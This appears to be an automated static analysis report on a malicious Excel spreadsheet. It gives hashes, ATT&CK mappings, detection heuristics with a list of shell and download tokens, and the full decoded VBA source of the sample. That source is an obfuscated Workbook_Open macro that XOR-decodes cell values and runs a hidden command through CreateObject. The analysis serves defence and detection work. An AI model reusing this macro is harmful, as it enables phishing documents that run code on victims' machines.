Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 f2b6ffd4ecce7e73…

MALICIOUS

Office (OLE) / .XLS

Size: 67.5 KB
Created: 2023-09-10 00:09:26
Authoring application: Microsoft Excel
First seen: 2023-09-12
MD5: 8a0eec19c5324236220f542abc338252
SHA-1: 640a6e7dd1627fbe850bd1d291c20285c044eda3
SHA-256: f2b6ffd4ecce7e73d0f6781352fdf1a7dd5dd9dcfa38f8cccc42277d684c8a79
Risk Score: 148

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1566.001 Spearphishing Attachment

This Excel file contains VBA macros, including a Workbook_Open event, which are designed to execute automatically. The macros utilize CreateObject and GetObject calls, indicating an attempt to interact with the system or download external content. The obfuscated VBA code likely decodes and executes a payload, but the specific URL or payload could not be reconstructed from the provided evidence.

Heuristics 5

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    Matched line in script:
        GetObject(Midnight).CreateObject(Confidential).Run Spoken & " " & Brochure & Macintosh, 0
  • GetObject call high OLE_VBA_GETOBJ
    Matched line in script:
        GetObject(Midnight).CreateObject(Confidential).Run Spoken & " " & Brochure & Macintosh, 0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Matched line in script:
        Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4325 bytes
SHA-256: caf8468e4aa6df3d46ef946899ecf5bf446a7c8ee76fa8db3b62015e8c0e9ed9
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private Function Cooper(ByVal Specialized As String) As Variant
    Dim Alien As Long: Alien = 0: Dim Displaying() As Byte
    Dim Loving() As Byte, Quantum As String, SpotS As Integer, Untitled As Integer, Justin As Integer
    Loving = "sf315be629"
    GoTo Binary
Scenario:
    If Alien < UBound(Displaying) Then
        SpotS = Alien Mod (10)
        Justin = Loving(SpotS * 2)
        Untitled = Displaying(Alien)
        GoTo SiSterS
Drinks:
        Quantum = Quantum & Chr(Displaying(Alien))
        Alien = Alien + 1
        GoTo Scenario
    Else
        GoTo Judicial
    End If
Judicial:
    Cooper = Quantum
    Exit Function
Binary:
    Displaying = Genes(Specialized)
    GoTo Scenario
SiSterS:
    Displaying(Alien) = Abs(Untitled Xor Justin)
    GoTo Drinks
End Function

Private Sub ConneCtor(ByVal Midnight As String, ByVal Macintosh As String, ByVal Spoken As String, ByVal Confidential As String, ByVal Brochure As String)
    GetObject(Midnight).CreateObject(Confidential).Run Spoken & " " & Brochure & Macintosh, 0
End Sub

Sub Workbook_Open()
    ConneCtor Cooper(Sheets("fec8").Range("F107").Value), Cooper(Sheets("fec8").Range("F157").Value), Cooper(Sheets("fec8").Range("H122").Value), Cooper(Sheets("fec8").Range("H164").Value), Cooper(Sheets("fec8").Range("G135").Value)
End Sub

Private Function Genes(ByVal IndIanapolIs As String) As Variant
    Dim Quantum() As Byte, i As Long, SpotS As Integer, SeminarS As Integer
    SeminarS = Len(IndIanapolIs) / 2: i = 0: ReDim Quantum(0 To SeminarS) As Byte
Justin:
    If i < Len(IndIanapolIs) Then
        SpotS = SpotS + 1
        Quantum(SpotS - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(IndIanapolIs, i + 1, 2)
        i = i + 2
        GoTo Justin
    Else
        GoTo Ethical
        Dim SiSterS As String
        SiSterS = InputBox("celp lape")
    End If
Ethical:
    Genes = Quantum
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True